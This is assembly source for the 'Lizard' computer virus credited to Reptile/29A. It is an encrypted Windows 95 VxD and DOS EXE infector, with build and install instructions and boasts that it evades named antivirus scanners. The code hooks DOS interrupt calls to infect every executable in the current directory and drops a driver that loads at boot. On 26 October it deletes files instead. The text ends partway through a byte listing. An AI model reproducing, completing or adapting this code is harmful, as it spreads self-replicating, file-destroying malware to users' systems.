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;Lizard by Reptile/29A (another version ;)
; <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>
;This is an encrypted vxd direct action dos exe infector (I added some anti-
;heuristics and other stuff and optimized the code of v1.0).
;When an infected file is run the virus decrypts itself, drops lzd.vxd to the
;available one of the three dirs and then returns back to the host. After the
;next reboot...
;When windoze 95 is starting, it loads the vxd (lzd.vxd) automatically coz
;it's in the '\iosubsys\' dir (Lizard doesn't need to modify the system.ini
;or the registry). Then the virus takes control and hooks the V86 interrupt
;chain. It executes on exec (4bh), create (3ch), ext. open (6ch), close (3eh)
;and on find first file (4eh) using direct action techniques to infect all
;dos exes in the current directory (*highly* infectious!). Lzd.vxd has a size
;of 7099 bytes (masm sux! :P ), but the victims are only increased by 1967 (!)
;Findvirus v7.75, AVP v3.0 and TBAV v8.03 (high heuristic sensitivity!) can't
;detect it (all for win95).
;Compiling lzd.vxd (win95 DDK):
;Compiling rmlzd.inc:
;tasm /m2 rmlzd.asm
;tlink /t rmlzd.obj
;file2db rmlzd.com (or another db generator)
;modify rmlzd.dat
;To install copy lzd.vxd to one of the following dirs:
;- c:\windows\system\iosubsys
;- c:\win95\system\iosubsys
;- c:\windows.000\system\iosubsys
;...or start lizard.exe :)
;Sandy: are u lucky now? ;)
;Jacky: thanx for testing it!
;GriYo: the stack stuff really didn't work :P
;TrY MaGiC MuShRoOmS...
include vmm.inc
vxdhsize equ 701
vxddsize equ 81
vxdcsize equ 880
esize equ encend - encstart
vsize equ vend - start
Declare_Virtual_Device LZD, 6, 66, LZD_Control, Undefined_Device_Id, \
wcard db '*.e?e',0 ;*.l?z
include rmlzd.inc ;realmode code
dflag db 0
pflag db 0
ndta db 43 dup (?)
header db 26 dup (?)
BeginProc LZD_Device_Init
mov ah,2ah ;get date
vxdint 21h
;live drazil si
cmp dh,10 ;26.10.?
jne npload
cmp dl,26
jne npload
mov pflag,1 ;hehe
mov eax,21h ;install int 21h handler
mov esi,offset32 int21h
VMMcall Hook_V86_Int_Chain
EndProc LZD_Device_Init
BeginProc int21h
cmp [ebp.Client_AH],4bh ;exec
je short ww
cmp [ebp.Client_AH],3ch ;create
je short ww
cmp [ebp.Client_AH],6ch ;ext. open
je short ww
cmp [ebp.Client_AH],3eh ;close
je short ww
cmp [ebp.Client_AH],4eh ;find first
je short ww
jmp prevhook
Push_Client_State ;save regs
VMMcall Begin_Nest_Exec
cmp dflag,1
je done
mov ax,3d02h ;open lzd.vxd
lea edx,dropname1 ;in the 'c:\windows\system\iosubsys' dir
vxdint 21h
jnc short rd
mov ax,3d02h ;open the vxd
lea edx,dropname2 ;in the 'c:\win95\system\iosubsys' dir
vxdint 21h
jnc short rd
mov ax,3d02h ;open the vxd
lea edx,dropname3 ;in the 'c:\windows.000\system\iosubsys' dir
vxdint 21h
jc ecsit ;skip it
xchg ax,bx
mov ah,3fh ;store the header of the vxd
mov cx,vxdhsize
lea edx,vxdheader
vxdint 21h
mov ax,4201h ;jmp over zeros
xor cx,cx
mov dx,3400
vxdint 21h
mov ah,3fh ;store the vxddata
mov cx,vxddsize
lea edx,vxddata
vxdint 21h
mov ax,4201h ;jmp over realmodecode and zeros
xor cx,cx
mov dx,2037
vxdint 21h
mov ah,3fh ;store the vxdcode
mov cx,vxdcsize
lea edx,vxdcode
vxdint 21h
mov ah,3eh ;close...
vxdint 21h
mov dflag,1 ;set flag
mov ah,1ah ;set dta
lea edx,ndta
vxdint 21h
mov ah,4eh ;search for first exe
jmp short w
mov ah,4fh ;find next exe
mov cx,7
lea edx,wcard ;*.e?e
vxdint 21h
jc ecsit
mov ax,4301h ;set normal attribute
mov cx,20h
lea edx,[ndta + 30]
vxdint 21h
cmp pflag,1 ;sux0ring microsuckers
jne pheeew ;(the payload in v1.0 was a bit too destructive ;)
;evil payload against the imperialism of microsoft!
mov ah,41h ;yhcrana
lea edx,[ndta + 30]
vxdint 21h
jmp ecsit
mov ax,3d02h ;open the victim
lea edx,[ndta + 30]
vxdint 21h
jc fnext
xchg ax,bx
mov ah,3fh ;read header
mov cx,26
lea edx,header
vxdint 21h
cmp word ptr [header],'ZM' ;exe?
jne cfile
cmp word ptr [header + 0ch],0ffffh ;allocate all mem?
jne cfile
cmp word ptr [header + 18h],40h ;win exe?
je cfile
mov al,[header + 12h] ;infected?
or al,al
jne cfile
;save ss:sp
mov ax,word ptr [header + 0eh]
mov sseg,ax
mov ax,word ptr [header + 10h]
mov ssp,ax
;save cs:ip
mov eax,dword ptr [header + 14h]
mov csip,eax
mov ax,4202h ;eof
xor cx,cx
vxdint 21h
;calc new cs:ip
mov cx,16
div cx
sub ax,word ptr [header + 8]
mov word ptr [header + 14h],dx
mov word ptr [header + 16h],ax
add edx,vend ;calc stack
mov word ptr [header + 0eh],ax
mov word ptr [header + 10h],dx
;xor encryption
in al,40h
or al,al
je rdnm
mov [encval],al ;save random value
mov edi,offset32 encstart
mov cx,esize
xor [edi],al
inc edi
loop xl
;write virus
mov ah,40h
mov cx,vsize
mov edx,offset32 start
vxdint 21h
mov al,[encval]
mov edi,offset32 encstart
mov cx,esize
xor [edi],al
inc edi
loop xll
mov ax,4202h ;eof
xor cx,cx
vxdint 21h
mov cx,512 ;calc pages
div cx
or dx,dx
jz short np
inc ax
mov word ptr [header + 4],ax
mov word ptr [header + 2],dx
mov ax,4200h ;bof
xor cx,cx
vxdint 21h
in al,40h ;set infection flag
or al,al
je rnd
mov [header + 12h],al
mov ah,40h ;write new header
mov cx,26
lea edx,header
vxdint 21h
mov cl,byte ptr [ndta + 21] ;restore attribute
lea edx,[ndta + 1eh]
mov ax,4301h
vxdint 21h
mov cx,word ptr [ndta + 22] ;restore time/date
mov dx,word ptr [ndta + 24]
mov ax,5701
vxdint 21h
mov ah,3eh ;close file
vxdint 21h
jmp fnext
VMMcall End_Nest_Exec
EndProc int21h
BeginProc LZD_Control
Control_Dispatch Init_Complete,LZD_Device_Init
EndProc LZD_Control
wb db 13,10,'Lizard by Reptile/29A',0
End ;this is the end my only friend the end...
;Lizard's real mode portion
vxdhsize equ 701
vxddsize equ 81
vxdcsize equ 880
esize equ encend - encstart
rmsize equ rmend - rmstart
.model tiny
org 100h
;get delta
call $ + 3
pop si
sub si,offset drazil
push si
pop bp
push ds ;coz psp
push cs
pop ds
;decrypt it
db 176 ;mov al
encval db 0
lea di,[bp + offset encstart]
mov cx,esize
jmp fj
inc di
loop xd
jmp encstart
xor [di],al
jmp fj2
mov ax,3d00h ;try to open lzd.vxd in
lea dx,[bp + offset dropname1] ;c:\windows\system\iosubsys
int 21h
jnc cfile ;exit if already installed
mov ah,3ch ;install lzd.vxd
xor cx,cx
int 21h
jnc inst
mov ax,3d00h ;try to open lzd.vxd in
lea dx,[bp + offset dropname2] ;c:\win95\system\iosubsys
int 21h
jnc cfile
mov ah,3ch
xor cx,cx
int 21h
jnc inst
mov ax,3d00h ;try to open lzd.vxd in
lea dx,[bp + offset dropname3] ;c:\windows.000\system\iosubsys
int 21h
jnc cfile
mov ah,3ch
xor cx,cx
int 21h
jc exit
xchg ax,bx
mov ah,40h ;write the header
mov cx,vxdhsize
lea dx,[bp + offset vxdheader]
int 21h
;write some zeros
mov cx,3400
push cx
mov ah,40h
mov cx,1
lea dx,[bp + zero]
int 21h
pop cx
loop lzero
mov ah,40h ;write the data
mov cx,vxddsize
lea dx,[bp + offset vxddata]
int 21h
mov ah,40h ;write the rmcode
mov cx,rmsize
lea dx,[bp + offset rmstart]
int 21h
;write some more zeros
mov cx,1732
push cx
mov ah,40h
mov cx,1
lea dx,[bp + zero]
int 21h
pop cx
loop lzero2
mov ah,40h ;write the code
mov cx,vxdcsize
lea dx,[bp + offset vxdcode]
int 21h
mov ah,3eh
int 21h
;exe return
pop ax ;psp
add ax,11h
dec ax
add word ptr [bp + offset csip + 2],ax
db 5 ;add ax
sseg dw 0fff0h ;test
mov ss,ax
db 0bch ;mov sp
ssp dw 0fffeh
db 0eah
csip dd 0fff00000h
zero db 0
dropname1 db 'c:\windows\system\iosubsys\lzd.vxd',0
dropname2 db 'c:\win95\system\iosubsys\lzd.vxd',0
dropname3 db 'c:\windows.000\system\iosubsys\lzd.vxd',0
vxdheader db vxdhsize dup (?)
vxddata db vxddsize dup (?)
vxdcode db vxdcsize dup (?)
end start
;Modified db listing of rmlzd.com
db 0E8h, 000h, 000h, 05Eh, 081h, 0EEh, 003h, 001h
db 056h, 05Dh, 01Eh, 00Eh, 01Fh, 0B0h
;db 000h
encval db 0
db 08Dh
db 0BEh, 021h, 001h, 0B9h, 08Eh, 007h, 0EBh, 005h
db 047h, 0E2h, 0FBh, 0EBh, 004h, 030h, 005h, 0EBh
db 0F7h
db 0B8h, 000h, 03Dh, 08Dh, 096h, 0C6h, 001h
db 0CDh, 021h, 073h, 07Fh, 0B4h, 03Ch, 033h, 0C9h
db 0CDh, 021h, 073h, 026h, 0B8h, 000h, 03Dh, 08Dh
db 096h, 0E9h, 001h, 0CDh, 021h, 073h, 06Ch, 0B4h
db 03Ch, 033h, 0C9h, 0CDh, 021h, 073h, 013h, 0B8h
db 000h, 03Dh, 08Dh, 096h, 00Ah, 002h, 0CDh, 021h
db 073h, 059h, 0B4h, 03Ch, 033h, 0C9h, 0CDh, 021h
db 072h, 055h, 093h, 0B4h, 040h, 0B9h, 0BDh, 002h
db 08Dh, 096h, 031h, 002h, 0CDh, 021h, 0B9h, 048h
db 00Dh, 051h, 0B4h, 040h, 0B9h, 001h, 000h, 08Dh
db 096h, 0C5h, 001h, 0CDh, 021h, 059h, 0E2h, 0F1h
db 0B4h, 040h, 0B9h, 051h, 000h, 08Dh, 096h, 0EEh
db 004h, 0CDh, 021h, 0B4h, 040h, 0B9h, 031h, 001h
db 08Dh, 096h, 000h, 001h, 0CDh, 021h, 0B9h, 0C4h
db 006h, 051h, 0B4h, 040h, 0B9h, 001h, 000h, 08Dh
db 096h, 0C5h, 001h, 0CDh, 021h, 059h, 0E2h, 0F1h
db 0B4h, 040h, 0B9h, 070h, 003h, 08Dh, 096h, 03Fh
db 005h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h, 058h
db 005h, 011h, 000h, 048h, 001h, 086h, 0C3h, 001h
db |